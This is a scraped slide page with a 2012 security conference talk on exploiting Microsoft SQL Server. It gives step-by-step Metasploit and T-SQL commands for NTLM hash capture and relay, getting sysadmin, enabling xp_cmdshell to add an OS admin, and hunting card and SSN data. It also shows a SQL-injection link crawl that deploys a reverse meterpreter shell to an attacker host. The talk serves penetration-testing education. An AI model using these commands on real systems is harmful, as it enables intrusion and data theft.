Security features In MySQL 8.0Security features In MySQL 8.0
Security features In MySQL 8.0
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL
 
Whitepaper MS SQL Server on Linux
Whitepaper MS SQL Server on LinuxWhitepaper MS SQL Server on Linux
Whitepaper MS SQL Server on Linux
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
 
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureLow Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
 
MySQL database replication
MySQL database replicationMySQL database replication
MySQL database replication
 
Writing & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp BostonWriting & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp Boston
 
MySQL 101 PHPTek 2017
MySQL 101 PHPTek 2017MySQL 101 PHPTek 2017
MySQL 101 PHPTek 2017
 
Aeon mike guide transparent ssl filtering
Aeon mike guide transparent ssl filteringAeon mike guide transparent ssl filtering
Aeon mike guide transparent ssl filtering
 
Aeon mike guide transparent ssl filtering (1)
Aeon mike guide transparent ssl filtering (1)Aeon mike guide transparent ssl filtering (1)
Aeon mike guide transparent ssl filtering (1)
 

More from Scott Sutherland

Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Scott Sutherland
 
How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)
Scott Sutherland
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
Scott Sutherland
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Scott Sutherland
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
Scott Sutherland
 
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
Scott Sutherland
 
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
Scott Sutherland
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
Scott Sutherland
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Scott Sutherland
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
Scott Sutherland
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
Scott Sutherland
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360
Scott Sutherland
 
Declaration of malWARe
Declaration of malWAReDeclaration of malWARe
Declaration of malWARe
Scott Sutherland
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
Scott Sutherland
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Scott Sutherland
 

More from Scott Sutherland (15)

Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
 
How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
 
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
 
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360
 
Declaration of malWARe
Declaration of malWAReDeclaration of malWARe
Declaration of malWARe
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
 

Recently uploaded

Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Product School
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
Product School
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
Dorra BARTAGUIZ
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
RTTS
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Ramesh Iyer
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Sri Ambati
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Thierry Lestable
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 

Recently uploaded (20)

Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 

SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012

  • 1. SQL Server Exploitation, Escalation, and Pilfering AppSec USA 2012 Authors: Antti Rantasaari Scott Sutherland
  • 2. Who are we? Antti Rantasaari Scott Sutherland (@_nullbind) What we do… • Security consultants at NetSPI • Pentesters ‒ Network ‒ Web ‒ Thick • Researchers, bloggers, etc • Pinball enthusiasts
  • 3. What are we going to cover? 1. Database entry points 2. Domain user  Database user 3. Database user  OS admin 4. OS admin  Database admin 5. Database admin  OS admin 6. Finding sensitive data 7. Escalation: Service accounts 8. Escalation: Database Link Crawling 9. Conclusions
  • 4. Why target SQL Servers? Pentest Goal = Data Access • It’s deployed everywhere • Very few “exploits”, but it’s commonly misconfigured • Integrated with Windows and Active Directory authentication • Easy and stable to exploit
  • 5. Why develop Metasploit tools? • I suck at programming • Easy to use framework • Huge community support • Easy management of code (GitHub) • Easy distribution of code http://www.metasploit.com/ https://github.com/rapid7/metasploit-framework
  • 7. Entry Points: Summary asef Unauthenticated Options • SQL injections • Weak passwords Authenticated Options (usually) • Other database servers • Unencrypted connection strings: ‒ Files ‒ Registry ‒ Network • ODBC connections • Client tools (priv inheritance)
  • 8. DOMAIN user  DATABASE user Privilege Inheritance
  • 9. Privilege Inheritance: Summary The “Domains Users” group is often provided privileges to login into SQL Servers… Evil users just need to: • Find SQL Servers • Verify Access • Attack!
  • 10. Privilege Inheritance: Find SQL Servers Easy SQL Server Discovery = SQLPing v3.0 http://www.sqlsecurity.com/dotnetnuke/uploads/sqlping3.zip
  • 11. Privilege Inheritance: Find SQL Servers Finding SQL Servers with osql:
  • 12. Privilege Inheritance: Verify Access Test current user’s access to SQL Servers with osql: FOR /F “tokens=*” %i in (‘type sqlservers.txt’) do osql –E –S %i –Q “select ‘I have access to:’+@@servername”
  • 13. Privilege Inheritance: Verify Access Test alternative user’s access to the SQL Servers with the MSSQL_SQL Metasploit module: msfconsole use auxiliary/admin/mssql/mssql_sql set RHOST <IP RANGE> set RPORT <port> set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> Set SQL <query> run http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_sql
  • 16. DATABASE USER  OS ADMIN SMB Capture/Relay
  • 17. SMB Capture/Relay: Summary SQL Server supports functions that can access files via UNC paths using the privileges of the SQL Server service account. High level authentication process:
  • 18. SMB Capture/Relay: Summary Stored procedures with UNC support: ‒ *xp_dirtree ‒ *xp_fileexist ‒ xp_getfiledetails Possible SMB authentication attacks: Service Account Network Communication SMB Capture SMB Relay LocalSystem Computer Account Yes No NetworkService Computer Account Yes No *Local Administrator Local Administrator Yes Yes *Domain User Domain User Yes Yes *Domain Admin Domain Admin Yes Yes http://erpscan.com/press-center/smbrelay-bible-2-smbrelay-by-ms-sql-server/ http://www.netspi.com/blog/2010/07/01/invisible-threats-insecure-service-accounts/
  • 20. SMB Capture: Start Sniffing for Hashes Start Metasploit SMB capture module on your evil server to capture seeded password hashes: msfconsole use auxiliary/server/capture/smb set CAINPWFILE /root/cain_hashes.txt set JOHNPWFILE /root/john_hashes.txt exploit http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
  • 21. SMB Capture: Force MS SQL to Auth Force SQL Server to authenticate with the modules: MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set RHOSTS <IP RANGE> set RPORT <port> Set SMBPROXY <evil server> run
  • 22. SMB Capture: Obtain Seeded Hashes Obtaining service account hashes from the SQL Server should look something like this: DOMAIN: DEMO USER: serviceaccount LMHASH:5e17a06b538a42ae82273227fd61a5952f85252cc731bb25 NTHASH:763aa16c6882cb1b99d40dfc337b69e7e424d6524a91c03e http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
  • 23. SMB Capture: Crack Hashes 1. Crack first half of recovered LANMAN hash with seeded half LM Rainbow Tables: rcracki_mt -h 5e17a06b538a42ae ./halflmchall 2. Crack the second half with john the ripper to obtain case sensitive NTLM password. perl netntlm.pl --seed GPP4H1 --file /root/john_hashes.txt http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
  • 24. SMB Relay: Diagram Very high level overview: http://en.wikipedia.org/wiki/SMBRelay
  • 25. SMB Relay: Setup SMBProxy for Relay SMB Relay to 3rd Party with the SMB_Relay Metasploit exploit module: msfconsole use exploit/windows/smb/smb_relay set SMBHOST <targetserver> exploit If the service account has the local admin privileges on the remote system, then a shell will be returned by the smb_relay module http://www.metasploit.com/modules/exploit/windows/smb/smb_relay
  • 26. SMB Relay: Force MS SQL to Auth Force SQL Server to authenticate with the modules MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI Msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set RHOSTS <IP RANGE> set RPORT <port> Set SMBPROXY <evil server> run
  • 27. SMB Relay: Get Meterpreter Shells
  • 28. SMB Capture/Relay: Using PW or Shell If meterpreter then: • Type: shell • Type: osql –E –Q “what ever you want” If password: • Sign in via RDP • Open a cmd console • osql –E –Q “what ever you want”
  • 29. DEMO
  • 30. Do a crazy dance! BALLET = NOT CRAZY DANCING FLY = TOTALLY CRAZY
  • 31. OS ADMIN  DATABASE ADMIN SQL Server Local Authorization Bypass
  • 32. Local Auth Bypass: Summary How can we go from OS admin to DB admin? • SQL Server 2000 to 2008 ‒ LocalSystem = Sysadmin privileges • SQL Server 2012 ‒ Must migrate to SQL Server service process for Sysadmin privileges
  • 33. Local Auth Bypass: Summary Transparent Encryption = Mostly Useless (unless local hard drive encryption is in place and key management is done correctly)
  • 34. Local Auth Bypass: Psexec On SQL Server 2000 to 2008 Execute queries as sysadmin with osql: psexec –s cmd.exe osql –E –S “localhostsqlexpress” –Q “select is_srvrolemember(‘sysadmin’)” Execute queries as sysadmin with SSMS: psexec –i –s ssms http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
  • 35. Local Auth Bypass: Get Shell Obtain Meterpreter shell using the PSEXEC module msfconsole use exploit/windows/smb/psexec set RHOST <targetserver> set SMBDOMAIN . set SMBUSER <user> set SMBPASS <password> exploit http://www.metasploit.com/modules/exploit/windows/smb/psexec
  • 36. Local Auth Bypass: Get Sysadmin Create sysadmin in database using the Metasploit mssql_local_auth_bypass post module: In Meterpeter type “background” to return to msconsole. Then, in the msfconsole type: use post/windows/manage/mssql_local_auth_bypass set session <session> set DB_USERNAME <username> set DB_PASSWORD <password> exploit http://www.metasploit.com/modules/post/windows/manage/mssql_local_auth_bypass
  • 37. SQL Server Auth Bypass: Got Sysadmin asef
  • 38. Do a crazy whale dance! To the left… To the right… Now dive!
  • 39. DATABASE ADMIN  OS ADMIN xp_cmdshell
  • 40. XP_CMDSHELL: Summary XP_CMDSHELL = OS COMMAND EXEC Yes. We know you already know this, but don’t forget…
  • 41. XP_CMDSHELL: Re-Install Re-install xp_cmdshell EXEC master..sp_addextendedproc "xp_cmdshell", "C:Program FilesMicrosoft SQL ServerMSSQLBinnxplog70.dll";
  • 42. XP_CMDSHELL: Re-Enable Re-enable xp_cmdshell sp_configure ‘show advanced options’, 1; reconfigure; go; sp_configure ‘xp_cmdshell’, 1; reconfigure; go;
  • 43. XP_CMDSHELL: Execute Commands Add Local OS Administrator with xp_cmdshell EXEC master..xp_cmdshell ‘net user myadmin MyP@sword1’ EXEC master..xp_cmdshell ‘net localgroup administrators /add myadmin’
  • 45. Finding Data: Summary GOAL = Find sensitive data! • Credit cards • Social security number • Medical records
  • 46. Finding Data: TSQL Script Simple keywords search via TSQL! EXEC master..sp_msforeachdb 'SELECT @@Servername as Server_Name,''[?]'' as Database_name,Table_Name,Column_Name FROM [?].INFORMATION_SCHEMA.COLUMNS WHERE Column_Name LIKE ''%password%'' OR Column_Name LIKE ''%Credit%'' OR Column_Name LIKE ''%CCN%'' OR Column_Name LIKE ''%Account%'' OR Column_Name LIKE ''%Social%'' OR Column_Name LIKE ''%SSN%'' ORDER BY Table_name'
  • 47. Finding Data: Metasploit Module Database scraping with the mssql_findandsampledata module! Features • Scan multiple servers • Authenticate with local Windows, Domain or SQL credentials • Sample data • Number of records found • Output to screen and CSV file http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_findandsampledata
  • 48. Finding Data: Metasploit Module Launching mssql_findandsampledata: msfconsole use auxiliary/admin/mssql/mssql_findandsampledata set RHOSTS <range> set RPORT <port> setg USE_WINDOWS_AUTHENT true setg DOMAIN <CompanyDomain> set USERNAME <username> set PASSWORD <password> set SAMPLE_SIZE <size> set KEYWORDS credit|social|password exploit
  • 49. Finding Data: Module Output asef
  • 51. Do a crazy cat disco dance!
  • 53. Shared Service Accounts: Summary XP_CMDSHELL + Shared Service Accounts + OSQL -E = (more) Unauthorized DATA access
  • 54. Shared Service Accounts: Diagram asef
  • 55. Shared Service Accounts: TSQL Script XP_CMDSHELL + OSQL = MORE ACCESS! EXEC master..xp_cmdshell ‘osql –E –S HVA –Q “select super.secret.data”’ More examples: http://www.netspi.com/blog/2011/07/19/when-databases-attack-hacking- with-the-osql-utility/
  • 57. Database Link Crawling: Summary Database Links • Allow one database server to query another • Often configured with excessive privileges • Can be chained together • Use openquery() to query linked servers • Can be used to execute the infamous xp_cmdshell • Tons of access, no credentials required (via SQL injection)
  • 58. Database Link Crawling: Diagram asef
  • 59. Database Link Crawling: List Links How do I list linked servers? Two common options: sp_linkedservers and SELECT srvname FROM master..sysservers
  • 60. Database Link Crawling: List Links How do I list linked servers on a linked server? SELECT srvname FROM openquery(DB1, 'select srvname FROM master..sysservers')
  • 61. Database Link Crawling: List Links How do I list linked servers on the linked server’s linked server? SELECT srvname FROM openquery(DB1,'SELECT srvname FROM openquery(HVA,''SELECT srvname FROM master..sysservers'')')
  • 62. Database Link Crawling: You Get it! ….You get the point You can follow links until you run out 
  • 63. Database Link Crawling: Exec Cmds How do I run commands on a linked server? SELECT * FROM openquery(DB1,’SELECT * FROM openquery(HVA,’’SELECT 1;exec xp_cmdshell ‘’’’ping 192.168.1.1’’’’ ‘’)’)
  • 64. Database Link Crawling: Modules Two Modules 1. Direct connection 2. SQL Injection Available for Download • Not submitted to Metasploit trunk – Yet • Downloads available from nullbind’s github ‒ mssql_linkcrawler.rb ‒ mssql_linkcrawler_sqli.rb
  • 65. Database Link Crawling: Modules • Features ‒ Crawl SQL Server database links ‒ Standard Crawl output ‒ Verbose Crawl output ‒ Output to CSV file ‒ Supports 32 and 64 bit Windows ‒ Global Metasploit payload deployment ‒ Targeted Metasploit payload deployment ‒ Payload deployment via powershell memory injection
  • 66. Metasploit Module: Run multi/handler Setup the multi/handler module: use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 443 set ExitOnSession false exploit -j -z
  • 67. Metasploit Module: Link Crawler Setup the mssql_linkcrawler_sqli module: use exploit/windows/mssql/mssql_linkcrawler_sqli set GET_PATH /employee.asp?id=1;[SQLi];-- set type blind set RHOST 192.168.1.100 set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.130 set lport 443 set DisablePayloadHandler true exploit
